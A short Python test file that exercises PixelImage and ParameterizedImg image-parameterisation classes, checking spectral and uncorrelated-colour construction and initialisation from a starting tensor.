format='%d.%m.%Y'):\n if value is None:\n return ''\n return value.strftime(format)\n\n @app.template_filter()\n def format_datetime(value, format='%d.%m.%Y %H:%M'):\n if value is None:\n return 
''\n return value.strftime(format)\n\n\ndef register_loggers(app):\n \"\"\"Initialize and configure logging.\"\"\"\n if 'DEBUG' in app.config and not app.config['DEBUG']:\n import logging\n stream_handler = logging.StreamHandler()\n app.logger.addHandler(stream_handler)\n app.logger.setLevel(logging.INFO)\n\n\ndef register_caching(app):\n \"\"\"Prevent cached responses in debug.\"\"\"\n if 'DEBUG' in app.config and app.config['DEBUG']:\n\n @app.after_request\n def after_request(response):\n response.headers['Cache-Control'\n ] = 'no-cache, no-store, must-revalidate, public, max-age=0'\n response.headers['Expires'] = 0\n response.headers['Pragma'] = 'no-cache'\n return response\n",
"step-4": "<mask token>\n\n\ndef init_app(config_object=ProdConfig):\n \"\"\"Define an application factory.\n\n See: http://flask.pocoo.org/docs/patterns/appfactories/\n\n :param config_object: The configuration object to use.\n \"\"\"\n app = Flask(__name__)\n app.config.from_object(config_object)\n if app.config['SERVER_CORS']:\n CORS(app, resources={'/api/*': {'origins': '*'}})\n app.config['CORS_HEADERS'] = 'Content-Type'\n if app.config['SERVER_PROXY']:\n app.wsgi_app = ProxyFix(app, x_for=1, x_proto=1, x_host=1)\n else:\n app.wsgi_app = WhiteNoise(app.wsgi_app, prefix='static/')\n for static in ('css', 'img', 'js', 'public'):\n app.wsgi_app.add_files('dribdat/static/' + static)\n register_extensions(app)\n register_blueprints(app)\n register_oauthhandlers(app)\n register_errorhandlers(app)\n register_filters(app)\n register_loggers(app)\n register_shellcontext(app)\n register_commands(app)\n register_caching(app)\n return app\n\n\ndef register_extensions(app):\n \"\"\"Register Flask extensions.\"\"\"\n assets.init_app(app)\n hashing.init_app(app)\n cache.init_app(app)\n db.init_app(app)\n login_manager.init_app(app)\n migrate.init_app(app, db)\n init_mailman(app)\n init_talisman(app)\n return None\n\n\ndef init_mailman(app):\n \"\"\"Initialize mailer support.\"\"\"\n if 'MAIL_SERVER' in app.config and app.config['MAIL_SERVER']:\n if not app.config['MAIL_DEFAULT_SENDER']:\n app.logger.warn('MAIL_DEFAULT_SENDER is required to send email')\n else:\n mail = Mail()\n mail.init_app(app)\n\n\ndef init_talisman(app):\n \"\"\"Initialize Talisman support.\"\"\"\n if 'SERVER_SSL' in app.config and app.config['SERVER_SSL']:\n Talisman(app, content_security_policy=app.config['CSP_DIRECTIVES'],\n frame_options_allow_from='*')\n\n\ndef register_blueprints(app):\n \"\"\"Register Flask blueprints.\"\"\"\n app.register_blueprint(public.views.blueprint)\n app.register_blueprint(public.project.blueprint)\n app.register_blueprint(public.auth.blueprint)\n app.register_blueprint(public.api.blueprint)\n app.register_blueprint(admin.views.blueprint)\n return None\n\n\ndef register_oauthhandlers(app):\n \"\"\"Set up OAuth handlers based on configuration.\"\"\"\n blueprint = get_auth_blueprint(app)\n if blueprint is not None:\n app.register_blueprint(blueprint, url_prefix='/oauth')\n\n\ndef register_errorhandlers(app):\n \"\"\"Register error handlers.\"\"\"\n\n def render_error(error):\n \"\"\"Render error template.\"\"\"\n error_code = getattr(error, 'code', 500)\n return render_template('{0}.html'.format(error_code)), error_code\n for errcode in [401, 404, 500]:\n app.errorhandler(errcode)(render_error)\n return None\n\n\ndef register_shellcontext(app):\n \"\"\"Register shell context objects.\"\"\"\n\n def shell_context():\n \"\"\"Shell context objects.\"\"\"\n from dribdat.user.models import User\n return {'db': db, 'User': User}\n app.shell_context_processor(shell_context)\n\n\ndef register_commands(app):\n \"\"\"Register Click commands.\"\"\"\n app.cli.add_command(commands.lint)\n app.cli.add_command(commands.clean)\n app.cli.add_command(commands.urls)\n\n\ndef register_filters(app):\n \"\"\"Register filters for templates.\"\"\"\n Misaka(app, autolink=True, fenced_code=True, strikethrough=True, tables\n =True)\n app.oembed_providers = bootstrap_basic()\n\n @app.template_filter()\n def onebox(value):\n return make_oembedplus(value, app.oembed_providers, maxwidth=600,\n maxheight=400)\n app.tz = timezone(app.config['TIME_ZONE'])\n app.jinja_env.filters['quote_plus'] = lambda u: quote_plus(u or '', ':/?&='\n 
)\n\n @app.template_filter()\n def since_date(value):\n return timesince(value)\n\n @app.template_filter()\n def until_date(value):\n return timesince(value, default='now!', until=True)\n\n @app.template_filter()\n def format_date(value, format='%d.%m.%Y'):\n if value is None:\n return ''\n return value.strftime(format)\n\n @app.template_filter()\n def format_datetime(value, format='%d.%m.%Y %H:%M'):\n if value is None:\n return ''\n return value.strftime(format)\n\n\ndef register_loggers(app):\n \"\"\"Initialize and configure logging.\"\"\"\n if 'DEBUG' in app.config and not app.config['DEBUG']:\n import logging\n stream_handler = logging.StreamHandler()\n app.logger.addHandler(stream_handler)\n app.logger.setLevel(logging.INFO)\n\n\ndef register_caching(app):\n \"\"\"Prevent cached responses in debug.\"\"\"\n if 'DEBUG' in app.config and app.config['DEBUG']:\n\n @app.after_request\n def after_request(response):\n response.headers['Cache-Control'\n ] = 'no-cache, no-store, must-revalidate, public, max-age=0'\n response.headers['Expires'] = 0\n response.headers['Pragma'] = 'no-cache'\n return response\n",
"step-5": "# -*- coding: utf-8 -*-\n\"\"\"The app module, containing the app factory function.\"\"\"\n\nfrom flask import Flask, render_template\nfrom flask_cors import CORS\nfrom flask_misaka import Misaka\nfrom flask_mailman import Mail\nfrom flask_talisman import Talisman\nfrom werkzeug.middleware.proxy_fix import ProxyFix\nfrom micawber.providers import bootstrap_basic\nfrom whitenoise import WhiteNoise\nfrom pytz import timezone\nfrom urllib.parse import quote_plus\nfrom dribdat import commands, public, admin\nfrom dribdat.assets import assets # noqa: I005\nfrom dribdat.sso import get_auth_blueprint\nfrom dribdat.extensions import (\n hashing,\n cache,\n db,\n login_manager,\n migrate,\n)\nfrom dribdat.settings import ProdConfig # noqa: I005\nfrom dribdat.utils import timesince\nfrom dribdat.onebox import make_oembedplus\n\n\ndef init_app(config_object=ProdConfig):\n \"\"\"Define an application factory.\n\n See: http://flask.pocoo.org/docs/patterns/appfactories/\n\n :param config_object: The configuration object to use.\n \"\"\"\n app = Flask(__name__)\n app.config.from_object(config_object)\n\n # Set up cross-site access to the API\n if app.config['SERVER_CORS']:\n CORS(app, resources={r\"/api/*\": {\"origins\": \"*\"}})\n app.config['CORS_HEADERS'] = 'Content-Type'\n\n # Set up using an external proxy/static server\n if app.config['SERVER_PROXY']:\n app.wsgi_app = ProxyFix(app, x_for=1, x_proto=1, x_host=1)\n else:\n # Internally optimize static file hosting\n app.wsgi_app = WhiteNoise(app.wsgi_app, prefix='static/')\n for static in ('css', 'img', 'js', 'public'):\n app.wsgi_app.add_files('dribdat/static/' + static)\n\n register_extensions(app)\n register_blueprints(app)\n register_oauthhandlers(app)\n register_errorhandlers(app)\n register_filters(app)\n register_loggers(app)\n register_shellcontext(app)\n register_commands(app)\n register_caching(app)\n return app\n\n\ndef register_extensions(app):\n \"\"\"Register Flask extensions.\"\"\"\n assets.init_app(app)\n hashing.init_app(app)\n cache.init_app(app)\n db.init_app(app)\n login_manager.init_app(app)\n migrate.init_app(app, db)\n init_mailman(app)\n init_talisman(app)\n return None\n\n\ndef init_mailman(app):\n \"\"\"Initialize mailer support.\"\"\"\n if 'MAIL_SERVER' in app.config and app.config['MAIL_SERVER']:\n if not app.config['MAIL_DEFAULT_SENDER']:\n app.logger.warn('MAIL_DEFAULT_SENDER is required to send email')\n else:\n mail = Mail()\n mail.init_app(app)\n\n\ndef init_talisman(app):\n \"\"\"Initialize Talisman support.\"\"\"\n if 'SERVER_SSL' in app.config and app.config['SERVER_SSL']:\n Talisman(app,\n content_security_policy=app.config['CSP_DIRECTIVES'],\n frame_options_allow_from='*')\n\n\ndef register_blueprints(app):\n \"\"\"Register Flask blueprints.\"\"\"\n app.register_blueprint(public.views.blueprint)\n app.register_blueprint(public.project.blueprint)\n app.register_blueprint(public.auth.blueprint)\n app.register_blueprint(public.api.blueprint)\n app.register_blueprint(admin.views.blueprint)\n return None\n\n\ndef register_oauthhandlers(app):\n \"\"\"Set up OAuth handlers based on configuration.\"\"\"\n blueprint = get_auth_blueprint(app)\n if blueprint is not None:\n app.register_blueprint(blueprint, url_prefix=\"/oauth\")\n\n\ndef register_errorhandlers(app):\n \"\"\"Register error handlers.\"\"\"\n def render_error(error):\n \"\"\"Render error template.\"\"\"\n # If a HTTPException, pull the `code` attribute; default to 500\n error_code = getattr(error, 'code', 500)\n return 
render_template('{0}.html'.format(error_code)), error_code\n for errcode in [401, 404, 500]:\n app.errorhandler(errcode)(render_error)\n return None\n\n\ndef register_shellcontext(app):\n \"\"\"Register shell context objects.\"\"\"\n def shell_context():\n \"\"\"Shell context objects.\"\"\"\n from dribdat.user.models import User\n return {\n 'db': db,\n 'User': User}\n\n app.shell_context_processor(shell_context)\n\n\ndef register_commands(app):\n \"\"\"Register Click commands.\"\"\"\n app.cli.add_command(commands.lint)\n app.cli.add_command(commands.clean)\n app.cli.add_command(commands.urls)\n\n\ndef register_filters(app):\n \"\"\"Register filters for templates.\"\"\"\n #\n # Conversion of Markdown to HTML\n Misaka(app, autolink=True, fenced_code=True,\n strikethrough=True, tables=True)\n\n # Registration of handlers for micawber\n app.oembed_providers = bootstrap_basic()\n\n @app.template_filter()\n def onebox(value):\n return make_oembedplus(\n value, app.oembed_providers, maxwidth=600, maxheight=400\n )\n\n # Timezone helper\n app.tz = timezone(app.config['TIME_ZONE'])\n\n # Lambda filters for safe image_url's\n app.jinja_env.filters['quote_plus'] = lambda u: quote_plus(u or '', ':/?&=')\n\n # Custom filters\n @app.template_filter()\n def since_date(value):\n return timesince(value)\n\n @app.template_filter()\n def until_date(value):\n return timesince(value, default=\"now!\", until=True)\n\n @app.template_filter()\n def format_date(value, format='%d.%m.%Y'):\n if value is None: return ''\n return value.strftime(format)\n\n @app.template_filter()\n def format_datetime(value, format='%d.%m.%Y %H:%M'):\n if value is None: return ''\n return value.strftime(format)\n\n\ndef register_loggers(app):\n \"\"\"Initialize and configure logging.\"\"\"\n if 'DEBUG' in app.config and not app.config['DEBUG']:\n import logging\n stream_handler = logging.StreamHandler()\n app.logger.addHandler(stream_handler)\n app.logger.setLevel(logging.INFO)\n\n\ndef register_caching(app):\n \"\"\"Prevent cached responses in debug.\"\"\"\n if 'DEBUG' in app.config and app.config['DEBUG']:\n @app.after_request\n def after_request(response):\n response.headers[\"Cache-Control\"] = \"no-cache, no-store, must-revalidate, public, max-age=0\"\n response.headers[\"Expires\"] = 0\n response.headers[\"Pragma\"] = \"no-cache\"\n return response\n",
"step-ids": [
5,
9,
10,
12,
14
]
}
|
[
5,
9,
10,
12,
14
] |
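A minimal driver for the application factory in the record above. The module path `dribdat.app` is an assumption inferred from the record's own `dribdat.*` imports; only `init_app` and `ProdConfig` appear in the record itself.

# Illustrative only: run the factory from the record above locally.
from dribdat.app import init_app          # module path assumed, not shown in the record
from dribdat.settings import ProdConfig   # shown in the record's step-5 imports

app = init_app(ProdConfig)

if __name__ == '__main__':
    app.run()  # Flask's built-in server, for local testing only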
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
def get_teacherData():
excelDir = '../data/松勤-教管系统接口测试用例-v1.4.xls'
workBook = xlrd.open_workbook(excelDir, formatting_info=True)
workSheet = workBook.sheet_by_name('3-老师模块')
dataList = []
for cnt in range(1, 2):
cellData = workSheet.cell_value(cnt, 6)
repsCellData = workSheet.cell_value(cnt, 8)
dataList.append((cellData, repsCellData))
return dataList
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
def get_teacherData():
excelDir = '../data/松勤-教管系统接口测试用例-v1.4.xls'
workBook = xlrd.open_workbook(excelDir, formatting_info=True)
workSheet = workBook.sheet_by_name('3-老师模块')
dataList = []
for cnt in range(1, 2):
cellData = workSheet.cell_value(cnt, 6)
repsCellData = workSheet.cell_value(cnt, 8)
dataList.append((cellData, repsCellData))
return dataList
get_teacherData()
<|reserved_special_token_1|>
import xlrd
def get_teacherData():
excelDir = '../data/松勤-教管系统接口测试用例-v1.4.xls'
workBook = xlrd.open_workbook(excelDir, formatting_info=True)
workSheet = workBook.sheet_by_name('3-老师模块')
dataList = []
for cnt in range(1, 2):
cellData = workSheet.cell_value(cnt, 6)
repsCellData = workSheet.cell_value(cnt, 8)
dataList.append((cellData, repsCellData))
return dataList
get_teacherData()
<|reserved_special_token_1|>
# time: 2020-11-28
import xlrd  # library for reading .xls workbooks
def get_teacherData():
    excelDir = r'../data/松勤-教管系统接口测试用例-v1.4.xls'
    workBook = xlrd.open_workbook(excelDir, formatting_info=True)  # keep the original cell styles
    # step 2: open the test-case sheet for this module
    workSheet = workBook.sheet_by_name('3-老师模块')  # look the sheet up by name
    dataList = []
    for cnt in range(1, 2):  # rows to read (range(1, 2) covers only row 1)
        cellData = workSheet.cell_value(cnt, 6)  # column 6: request data (string)
        repsCellData = workSheet.cell_value(cnt, 8)  # column 8: expected result (string)
        dataList.append((cellData, repsCellData))
    return dataList  # list of (request, expected) tuples
get_teacherData()
|
flexible
|
{
"blob_id": "d7dee3311e202ae50172077940fc625f1cc6836d",
"index": 1429,
"step-1": "<mask token>\n",
"step-2": "<mask token>\n\n\ndef get_teacherData():\n excelDir = '../data/松勤-教管系统接口测试用例-v1.4.xls'\n workBook = xlrd.open_workbook(excelDir, formatting_info=True)\n workSheet = workBook.sheet_by_name('3-老师模块')\n dataList = []\n for cnt in range(1, 2):\n cellData = workSheet.cell_value(cnt, 6)\n repsCellData = workSheet.cell_value(cnt, 8)\n dataList.append((cellData, repsCellData))\n return dataList\n\n\n<mask token>\n",
"step-3": "<mask token>\n\n\ndef get_teacherData():\n excelDir = '../data/松勤-教管系统接口测试用例-v1.4.xls'\n workBook = xlrd.open_workbook(excelDir, formatting_info=True)\n workSheet = workBook.sheet_by_name('3-老师模块')\n dataList = []\n for cnt in range(1, 2):\n cellData = workSheet.cell_value(cnt, 6)\n repsCellData = workSheet.cell_value(cnt, 8)\n dataList.append((cellData, repsCellData))\n return dataList\n\n\nget_teacherData()\n",
"step-4": "import xlrd\n\n\ndef get_teacherData():\n excelDir = '../data/松勤-教管系统接口测试用例-v1.4.xls'\n workBook = xlrd.open_workbook(excelDir, formatting_info=True)\n workSheet = workBook.sheet_by_name('3-老师模块')\n dataList = []\n for cnt in range(1, 2):\n cellData = workSheet.cell_value(cnt, 6)\n repsCellData = workSheet.cell_value(cnt, 8)\n dataList.append((cellData, repsCellData))\n return dataList\n\n\nget_teacherData()\n",
"step-5": "#time:2020-11-28\n\nimport xlrd #读取库\ndef get_teacherData():\n\n excelDir = r'../data/松勤-教管系统接口测试用例-v1.4.xls'\n workBook = xlrd.open_workbook(excelDir, formatting_info=True) # 保存原样---样式\n # 2-操作对应的用例表\n workSheet = workBook.sheet_by_name('3-老师模块') # 通过表名获取\n dataList = []\n for cnt in range(1, 2): # 到第四行\n cellData = workSheet.cell_value(cnt, 6) # 取第6列 字符串类型\n repsCellData = workSheet.cell_value(cnt, 8) # 取第8列 字符串类型 预期结果\n dataList.append((cellData, repsCellData))\n return dataList # 返回列表\n\nget_teacherData()\n\n\n\n\n",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
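A usage sketch for the spreadsheet reader above: the returned (request, expected) pairs are the natural input to a data-driven test. The ddt decorators and the placeholder assertions are illustrative assumptions, not part of the record; get_teacherData is assumed importable from the module above.

import unittest
from ddt import ddt, data, unpack  # ddt: a common data-driven-testing helper

@ddt
class TestTeacherModule(unittest.TestCase):
    @data(*get_teacherData())  # one test case per spreadsheet row
    @unpack
    def test_case(self, request_data, expected):
        # A real test would send request_data to the API under test and
        # compare the response with the expected column; this placeholder
        # only checks that both cells were read.
        self.assertIsNotNone(request_data)
        self.assertIsNotNone(expected)

if __name__ == '__main__':
    unittest.main()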
from app import db
class OrgStaff(db.Model):
__tablename__ = 'org_staff'
id = db.Column(db.Integer, primary_key=True)
user_id = db.Column(db.Integer, db.ForeignKey('users.id', ondelete="CASCADE"))
invited_by = db.Column(db.Integer, db.ForeignKey('users.id', ondelete="CASCADE"))
org_id = db.Column(db.Integer, db.ForeignKey('organisations.id', ondelete="CASCADE"))
user = db.relationship("User", primaryjoin="User.id==OrgStaff.user_id")
referer = db.relationship("User", primaryjoin="User.id==OrgStaff.invited_by")
org = db.relationship("Organisation", primaryjoin="Organisation.id==OrgStaff.org_id", backref='staff')
created_at = db.Column(db.DateTime, default=db.func.now())
updated_at = db.Column(db.DateTime, default=db.func.now(), onupdate=db.func.now())
|
normal
|
{
"blob_id": "b0f92b5e4cc972aca84a29b4568e85836f155273",
"index": 3774,
"step-1": "<mask token>\n",
"step-2": "<mask token>\n\n\nclass OrgStaff(db.Model):\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n",
"step-3": "<mask token>\n\n\nclass OrgStaff(db.Model):\n __tablename__ = 'org_staff'\n id = db.Column(db.Integer, primary_key=True)\n user_id = db.Column(db.Integer, db.ForeignKey('users.id', ondelete=\n 'CASCADE'))\n invited_by = db.Column(db.Integer, db.ForeignKey('users.id', ondelete=\n 'CASCADE'))\n org_id = db.Column(db.Integer, db.ForeignKey('organisations.id',\n ondelete='CASCADE'))\n user = db.relationship('User', primaryjoin='User.id==OrgStaff.user_id')\n referer = db.relationship('User', primaryjoin=\n 'User.id==OrgStaff.invited_by')\n org = db.relationship('Organisation', primaryjoin=\n 'Organisation.id==OrgStaff.org_id', backref='staff')\n created_at = db.Column(db.DateTime, default=db.func.now())\n updated_at = db.Column(db.DateTime, default=db.func.now(), onupdate=db.\n func.now())\n",
"step-4": "from app import db\n\n\nclass OrgStaff(db.Model):\n __tablename__ = 'org_staff'\n id = db.Column(db.Integer, primary_key=True)\n user_id = db.Column(db.Integer, db.ForeignKey('users.id', ondelete=\n 'CASCADE'))\n invited_by = db.Column(db.Integer, db.ForeignKey('users.id', ondelete=\n 'CASCADE'))\n org_id = db.Column(db.Integer, db.ForeignKey('organisations.id',\n ondelete='CASCADE'))\n user = db.relationship('User', primaryjoin='User.id==OrgStaff.user_id')\n referer = db.relationship('User', primaryjoin=\n 'User.id==OrgStaff.invited_by')\n org = db.relationship('Organisation', primaryjoin=\n 'Organisation.id==OrgStaff.org_id', backref='staff')\n created_at = db.Column(db.DateTime, default=db.func.now())\n updated_at = db.Column(db.DateTime, default=db.func.now(), onupdate=db.\n func.now())\n",
"step-5": "from app import db\n\n\nclass OrgStaff(db.Model):\n __tablename__ = 'org_staff'\n id = db.Column(db.Integer, primary_key=True)\n user_id = db.Column(db.Integer, db.ForeignKey('users.id', ondelete=\"CASCADE\"))\n invited_by = db.Column(db.Integer, db.ForeignKey('users.id', ondelete=\"CASCADE\"))\n org_id = db.Column(db.Integer, db.ForeignKey('organisations.id', ondelete=\"CASCADE\"))\n user = db.relationship(\"User\", primaryjoin=\"User.id==OrgStaff.user_id\")\n referer = db.relationship(\"User\", primaryjoin=\"User.id==OrgStaff.invited_by\")\n org = db.relationship(\"Organisation\", primaryjoin=\"Organisation.id==OrgStaff.org_id\", backref='staff')\n created_at = db.Column(db.DateTime, default=db.func.now())\n updated_at = db.Column(db.DateTime, default=db.func.now(), onupdate=db.func.now())\n\n",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
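A brief usage sketch for the model above. The user, admin, and org variables are hypothetical, previously persisted rows; only OrgStaff, db, and the relationships are taken from the record.

from app import db

# Hypothetical: user, admin and org are existing User/Organisation instances.
staff = OrgStaff(user_id=user.id, invited_by=admin.id, org_id=org.id)
db.session.add(staff)
db.session.commit()

# The backref declared on the org relationship exposes staff from the other side:
print(org.staff)      # -> [<OrgStaff ...>]
print(staff.referer)  # -> the inviting User, via the invited_by join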
#!/usr/bin/env python
import h5py
class HDF5_Parser(object): # noqa: N801
"""
Examples
--------
>>> import h5py
>>> indata = h5py.File('test.hdf5')
>>> dataset = indata.create_dataset("mydataset", (10,), dtype='i')
>>> indata.close()
>>> with open('test.hdf5') as f:
... data = HDF5_Parser().read_file(f)
>>> data['mydataset'][:]
array([0, 0, 0, 0, 0, 0, 0, 0, 0, 0], dtype=int32)
>>> import os
>>> os.remove('test.hdf5')
"""
plugin_name = 'hdf5.read'
plugin_descript = 'read *.hdf5 (in read mode) files using h5py'
file_regex = '*.hdf5'
def read_file(self, file_obj, **kwargs):
return h5py.File(file_obj.name, mode='r')
|
normal
|
{
"blob_id": "0beb5c5c5db9247d66a5a49cfff7282ead52a9b7",
"index": 716,
"step-1": "<mask token>\n\n\nclass HDF5_Parser(object):\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n\n def read_file(self, file_obj, **kwargs):\n return h5py.File(file_obj.name, mode='r')\n",
"step-2": "<mask token>\n\n\nclass HDF5_Parser(object):\n <mask token>\n plugin_name = 'hdf5.read'\n plugin_descript = 'read *.hdf5 (in read mode) files using h5py'\n file_regex = '*.hdf5'\n\n def read_file(self, file_obj, **kwargs):\n return h5py.File(file_obj.name, mode='r')\n",
"step-3": "<mask token>\n\n\nclass HDF5_Parser(object):\n \"\"\"\n\n Examples\n --------\n\n >>> import h5py\n >>> indata = h5py.File('test.hdf5')\n >>> dataset = indata.create_dataset(\"mydataset\", (10,), dtype='i')\n >>> indata.close()\n\n >>> with open('test.hdf5') as f:\n ... data = HDF5_Parser().read_file(f)\n >>> data['mydataset'][:]\n array([0, 0, 0, 0, 0, 0, 0, 0, 0, 0], dtype=int32)\n\n >>> import os\n >>> os.remove('test.hdf5')\n\n \"\"\"\n plugin_name = 'hdf5.read'\n plugin_descript = 'read *.hdf5 (in read mode) files using h5py'\n file_regex = '*.hdf5'\n\n def read_file(self, file_obj, **kwargs):\n return h5py.File(file_obj.name, mode='r')\n",
"step-4": "import h5py\n\n\nclass HDF5_Parser(object):\n \"\"\"\n\n Examples\n --------\n\n >>> import h5py\n >>> indata = h5py.File('test.hdf5')\n >>> dataset = indata.create_dataset(\"mydataset\", (10,), dtype='i')\n >>> indata.close()\n\n >>> with open('test.hdf5') as f:\n ... data = HDF5_Parser().read_file(f)\n >>> data['mydataset'][:]\n array([0, 0, 0, 0, 0, 0, 0, 0, 0, 0], dtype=int32)\n\n >>> import os\n >>> os.remove('test.hdf5')\n\n \"\"\"\n plugin_name = 'hdf5.read'\n plugin_descript = 'read *.hdf5 (in read mode) files using h5py'\n file_regex = '*.hdf5'\n\n def read_file(self, file_obj, **kwargs):\n return h5py.File(file_obj.name, mode='r')\n",
"step-5": "#!/usr/bin/env python\n\nimport h5py\n\n\nclass HDF5_Parser(object): # noqa: N801\n \"\"\"\n\n Examples\n --------\n\n >>> import h5py\n >>> indata = h5py.File('test.hdf5')\n >>> dataset = indata.create_dataset(\"mydataset\", (10,), dtype='i')\n >>> indata.close()\n\n >>> with open('test.hdf5') as f:\n ... data = HDF5_Parser().read_file(f)\n >>> data['mydataset'][:]\n array([0, 0, 0, 0, 0, 0, 0, 0, 0, 0], dtype=int32)\n\n >>> import os\n >>> os.remove('test.hdf5')\n\n \"\"\"\n\n plugin_name = 'hdf5.read'\n plugin_descript = 'read *.hdf5 (in read mode) files using h5py'\n file_regex = '*.hdf5'\n\n def read_file(self, file_obj, **kwargs):\n return h5py.File(file_obj.name, mode='r')\n",
"step-ids": [
2,
3,
4,
5,
6
]
}
|
[
2,
3,
4,
5,
6
] |
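One detail worth noting about the parser above: only file_obj.name is used, so the handle can be opened in plain text mode, and the returned h5py.File must be closed by the caller. A small sketch, with the file name assumed:

parser = HDF5_Parser()
with open('data.hdf5') as f:   # the parser reads f.name, not the handle itself
    h5file = parser.read_file(f)
try:
    print(list(h5file.keys()))  # top-level dataset/group names
finally:
    h5file.close()              # h5py.File objects need an explicit close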
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class Test_Proxy:
def __init__(self):
self.db = RedisClient()
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class Test_Proxy:
def __init__(self):
self.db = RedisClient()
def proxy_test(self, proxy):
url = TEST_URL
proxies = {'http': proxy, 'https': proxy}
try:
r = requests.get(url, proxies=proxies, timeout=5)
if r.status_code == 200:
self.db.max(proxy)
except requests.exceptions.ConnectionError:
self.db.decrease(proxy)
<|reserved_special_token_1|>
from redis_db import RedisClient
from setting import TEST_URL
import requests
class Test_Proxy:
def __init__(self):
self.db = RedisClient()
def proxy_test(self, proxy):
url = TEST_URL
proxies = {'http': proxy, 'https': proxy}
try:
r = requests.get(url, proxies=proxies, timeout=5)
if r.status_code == 200:
self.db.max(proxy)
except requests.exceptions.ConnectionError:
self.db.decrease(proxy)
<|reserved_special_token_1|>
from redis_db import RedisClient
from setting import TEST_URL
import requests
class Test_Proxy():
    def __init__(self):
        self.db = RedisClient()

    def proxy_test(self, proxy):
        url = TEST_URL
        proxies = {
            "http": proxy,
            "https": proxy
        }
        # print("{} (testing)".format(proxy))
        try:
            r = requests.get(url, proxies=proxies, timeout=5)
            if r.status_code == 200:
                # print("{} (usable)".format(proxy))
                self.db.max(proxy)
        except requests.exceptions.ConnectionError:
            self.db.decrease(proxy)
            # print("{} (score decreased)".format(proxy))
|
flexible
|
{
"blob_id": "2cbdb828ab6e0ad44154f0c5b2a1d807fd0d2520",
"index": 8783,
"step-1": "<mask token>\n",
"step-2": "<mask token>\n\n\nclass Test_Proxy:\n\n def __init__(self):\n self.db = RedisClient()\n <mask token>\n",
"step-3": "<mask token>\n\n\nclass Test_Proxy:\n\n def __init__(self):\n self.db = RedisClient()\n\n def proxy_test(self, proxy):\n url = TEST_URL\n proxies = {'http': proxy, 'https': proxy}\n try:\n r = requests.get(url, proxies=proxies, timeout=5)\n if r.status_code == 200:\n self.db.max(proxy)\n except requests.exceptions.ConnectionError:\n self.db.decrease(proxy)\n",
"step-4": "from redis_db import RedisClient\nfrom setting import TEST_URL\nimport requests\n\n\nclass Test_Proxy:\n\n def __init__(self):\n self.db = RedisClient()\n\n def proxy_test(self, proxy):\n url = TEST_URL\n proxies = {'http': proxy, 'https': proxy}\n try:\n r = requests.get(url, proxies=proxies, timeout=5)\n if r.status_code == 200:\n self.db.max(proxy)\n except requests.exceptions.ConnectionError:\n self.db.decrease(proxy)\n",
"step-5": "from redis_db import RedisClient\nfrom setting import TEST_URL\nimport requests\n\nclass Test_Proxy():\n def __init__(self):\n self.db=RedisClient()\n\n def proxy_test(self, proxy):\n url = TEST_URL\n proxies={\n \"http\":proxy,\n \"https\":proxy\n }\n # print(\"{}(测试中)\".format(proxy))\n try:\n r = requests.get(url, proxies=proxies, timeout=5)\n if r.status_code ==200:\n # print(\"{}(可用)\".format(proxy))\n self.db.max(proxy)\n except requests.exceptions.ConnectionError:\n self.db.decrease(proxy)\n # print(\"{}(减一)\".format(proxy))\n\n",
"step-ids": [
0,
2,
3,
4,
5
]
}
|
[
0,
2,
3,
4,
5
] |
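An illustrative driver for the tester above. The proxy list is hard-coded here because the record does not show how RedisClient enumerates stored proxies; only Test_Proxy and proxy_test come from the record.

tester = Test_Proxy()
for proxy in ('127.0.0.1:8080', '10.0.0.2:3128'):  # placeholder proxies
    # Scores are raised (max) or lowered (decrease) in Redis as a side effect.
    tester.proxy_test(proxy)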
# Generated by Django 3.1.2 on 2020-10-17 15:46
from django.db import migrations
class Migration(migrations.Migration):
dependencies = [
('story1', '0006_visitor'),
]
operations = [
migrations.RenameField(
model_name='visitor',
old_name='identitiy_number',
new_name='identity_number',
),
]
|
normal
|
{
"blob_id": "1aaace83af0235341d10b8ac3b47d00a944dac37",
"index": 1422,
"step-1": "<mask token>\n",
"step-2": "<mask token>\n\n\nclass Migration(migrations.Migration):\n <mask token>\n <mask token>\n",
"step-3": "<mask token>\n\n\nclass Migration(migrations.Migration):\n dependencies = [('story1', '0006_visitor')]\n operations = [migrations.RenameField(model_name='visitor', old_name=\n 'identitiy_number', new_name='identity_number')]\n",
"step-4": "from django.db import migrations\n\n\nclass Migration(migrations.Migration):\n dependencies = [('story1', '0006_visitor')]\n operations = [migrations.RenameField(model_name='visitor', old_name=\n 'identitiy_number', new_name='identity_number')]\n",
"step-5": "# Generated by Django 3.1.2 on 2020-10-17 15:46\r\n\r\nfrom django.db import migrations\r\n\r\n\r\nclass Migration(migrations.Migration):\r\n\r\n dependencies = [\r\n ('story1', '0006_visitor'),\r\n ]\r\n\r\n operations = [\r\n migrations.RenameField(\r\n model_name='visitor',\r\n old_name='identitiy_number',\r\n new_name='identity_number',\r\n ),\r\n ]\r\n",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
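For context, the RenameField operation above corresponds to fixing a typo on the model itself. A sketch of the corrected field follows; the field type and length are assumptions, since the record only shows the migration.

from django.db import models

class Visitor(models.Model):
    # Renamed from the misspelled 'identitiy_number' by migration 0007.
    identity_number = models.CharField(max_length=32)  # type/length assumed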
<|reserved_special_token_0|>
def test_pixel_image():
pi = PixelImage((1, 3, 128, 128), 0.01)
pi()
start = torch.randn(3, 128, 128)
pi = PixelImage((1, 3, 128, 128), init_img=start)
assert start.allclose(pi() + 0.5, atol=1e-07)
<|reserved_special_token_0|>
def test_parameterized_img():
start = torch.clamp(torch.randn(1, 3, 128, 128) + 0.5, min=0, max=1)
ParameterizedImg(1, 3, 128, 128, space='spectral', colors='uncorr')()
ParameterizedImg(1, 3, 128, 128, space='spectral', colors='uncorr',
init_img=start)()
ParameterizedImg(1, 3, 128, 128, space='spectral', colors='uncorr')()
start = torch.clamp(torch.randn(1, 3, 128, 129) + 0.5, min=0, max=1)
ParameterizedImg(1, 3, 128, 129, space='spectral', colors='uncorr',
init_img=start)()
